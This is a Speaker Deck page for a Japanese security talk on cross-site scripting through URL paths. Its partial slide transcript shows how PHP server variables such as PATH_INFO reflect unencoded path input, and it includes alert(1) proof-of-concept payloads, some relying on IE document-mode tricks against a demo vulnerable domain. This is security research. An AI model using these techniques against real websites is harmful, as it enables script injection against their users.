Upgrade to Pro — share decks privately, control downloads, hide ads and more …

明日から使える?! PATHでXSSする技術/ Shibuya.XSS techtalk #7

1a5bce24526a7d6f1ab89678df2d673c?s=47 Masato Kinugawa
March 29, 2016
Technology
14
21k

明日から使える?! PATHでXSSする技術/ Shibuya.XSS techtalk #7

Shibuya.XSS techtalk #7 の資料です。

1a5bce24526a7d6f1ab89678df2d673c?s=128

Masato Kinugawa

March 29, 2016
Tweet

More Decks by Masato Kinugawa

See All by Masato Kinugawa
1a5bce24526a7d6f1ab89678df2d673c?s=48 masatokinugawa
21
5k
1a5bce24526a7d6f1ab89678df2d673c?s=48 masatokinugawa
5
70k
1a5bce24526a7d6f1ab89678df2d673c?s=48 masatokinugawa
9
11k
1a5bce24526a7d6f1ab89678df2d673c?s=48 masatokinugawa
17
10k
1a5bce24526a7d6f1ab89678df2d673c?s=48 masatokinugawa
35
17k
1a5bce24526a7d6f1ab89678df2d673c?s=48 masatokinugawa
2
1.4k
1a5bce24526a7d6f1ab89678df2d673c?s=48 masatokinugawa
20
20k
1a5bce24526a7d6f1ab89678df2d673c?s=48 masatokinugawa
4
2.2k
1a5bce24526a7d6f1ab89678df2d673c?s=48 masatokinugawa
7
2.2k

Other Decks in Technology

See All in Technology
567600e04dbcb14d6bd8f120e6625a27?s=48 tsuyo
0
480
85da685d91fda190e2e3162d0de248a4?s=48 recruitengineers
0
230
96de66872f54da75c05c881c7a3713ce?s=48 kenya888
1
110
617bd4a28ec6cbc877c752a1b4e29e58?s=48 chomado
0
280
19fc8f6113c5c3d86e6176362ff29479?s=48 kanaugust
PRO
0
200
53850955f15249a1a9dc49df6113e400?s=48 line_developers
PRO
1
420
563d2e1e4cabf5ca21404f7104c90e91?s=48 prog893
14
3.6k
Fb025419ed38f98df595eb2eafc859f4?s=48 ihcomega56
2
740
73dfdf58c8072916f1b4c62c93279fd7?s=48 yuzoiwasaki
0
160
Ac734fc32781678475b577944bb5a9ae?s=48 charity
9
11k
966e29b84ae7dbde170f66b0bc75b7a6?s=48 ishiayaya
PRO
0
810
525442fc70ca92f82ae503f826956137?s=48 finengine
0
310

Featured

See All Featured
0fe2973fa8d27d96547e43322341183a?s=48 swwweet
206
6.9k
Fde6c3a50ca518a909ef35c22c0ee0e4?s=48 destraynor
146
19k
F68cb25ae3e5c2106997454b13b7737d?s=48 brad_frost
157
6.5k
24fc194843a71f10949be18d5a692682?s=48 gr2m
83
11k
8081b26e05bb4354f7d65ffc34cbbd67?s=48 chriscoyier
146
20k
1b75d89772b7eea1f6c89fbf362607d9?s=48 moore
125
21k
E14f55d3f939977cecbf51b64ff6f861?s=48 keithpitt
402
20k
96270e4c3e5e9806cf7245475c00b275?s=48 addyosmani
1346
200k
Bfd6b681ec6e8c9bef82ff0521c364f7?s=48 kastner
54
2k
7c8469ee8c9e594c65c59b919626c08d?s=48 scottboms
252
11k
245cee81a9c424266e5e401d844ea881?s=48 lara
16
2.9k
20bfe76b3d6105641f879fe45cfc9272?s=48 bkeepers
PRO
54
4.3k

Transcript

  1. None
  2. None
  3. None
  4. None
  5. None

  6. https://host/tags/aaa/ ... </head> <body> <form> <input type="text" value="aaa"> ...

  7. ... </head> <meta property="og:url" content="https://host/path/index"> <body> ... https://host/path/index?p=1

  8. ... </head> <meta property="og:url" content="https://host/path/index;aaa"> <body> ... https://host/path/index;aaa?p=1

  9. None

  10. http://php.net/index.php http://php.net/index.php/xxx/yyy/zzz

  11. http://shibuyaxss.connpass.com/event/28232/ http://shibuyaxss.connpass.com/event/28232/;abc

  12. None

  13. SCRIPT_URL /test.php/<b>PATH</b> SCRIPT_URI http://localhost/test.php/<b>PATH</b> PATH_INFO /<b>PATH</b> PATH_TRANSLATED \<b>PATH<\b> PHP_SELF /test.php/<b>PATH</b>

  14. GET /path?query HTTP/1.1 http://php.net/manual/ja/reserved.variables.server.php

  15. /test.php/<b>PATH</b>?<b>QUERY</b> GET /test.php/%3Cb%3EPATH%3C/b%3E?%3Cb%3EQUERY% 3C/b%3E HTTP/1.1 QUERY_STRING %3Cb%3EQUERY%3C/b%3E REQUEST_URI /test.php/%3Cb%3EPATH%3C/b%3E? %3Cb%3EQUERY%3C/b%3E

    http://localhost/test.php/<b>PATH</b>?<b>QUERY</b>

  16. /test.php/%3Cb%3EPATH%3C/b%3E?<b>QUERY</b> GET /test.php/%3Cb%3EPATH%3C/b%3E?<b>QUERY</b> HTTP/1.1 QUERY_STRING <b>QUERY</b> REQUEST_URI /test.php/%3Cb%3EPATH%3C/b%3E?<b>QUERY</b> http://localhost/test.php/<b>PATH</b>?<b>QUERY</b>

  17. http://localhost/test.php/<b>PATH</b> GET /test.php/<b>PATH</b> HTTP/1.1

  18. /test.php/%3Cb%3EPATH%3C/b%3E GET /test.php/<b>PATH</b> HTTP/1.1 REQUEST_URI /test.php/<b>PATH</b> location.pathname /test.php/%3Cb%3EPATH%3C/b%3E http://localhost/test.php/<b>PATH</b>

  19. None
  20. None
  21. None
  22. None
  23. None
  24. None
  25. None
  26. None
  27. None
  28. None
  29. None
  30. None
  31. None
  32. None
  33. None

  34. HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 X-UA-Compatible: IE=9 <head> <meta

    http-equiv="X-UA-Compatible" content="IE=9"> </head>

  35. <svg> <circle cx="100" cy="100" r="50" fill="red"/> </svg>

  36. ifr=document.createElement('<iframe onload=alert(1)>'); document.body.appendChild(ifr); InvalidCharacterError

  37. <meta http-equiv="X-UA-Compatible" content="IE=9"> <script> console.log(document.documentMode) /* 9 */ </script> <iframe

    src=//victim/></iframe> http://blogs.msdn.com/cfs-filesystemfile.ashx/__key/communityserver-blogs-components- weblogfiles/00-00-01-35-07/3073.IE_5F00_chart_5F00_jp.pdf

  38. <meta http-equiv="X-UA-Compatible" content="IE=9"> <embed src="http://shibuya.vulnerabledoma.in/javascript:alert(1)/% 2F..%2F..%2Fjizen2#hash"></embed>

  39. <script src="//ajax.googleapis.com/ajax/libs/jquerymobile/1.4.5/jquery.mobile.min.js"> </script>

  40. None
  41. None
  42. None
  43. None
  44. None
  45. None
  46. None
  47. None
  48. None
  49. None
  50. None
  51. None
  52. None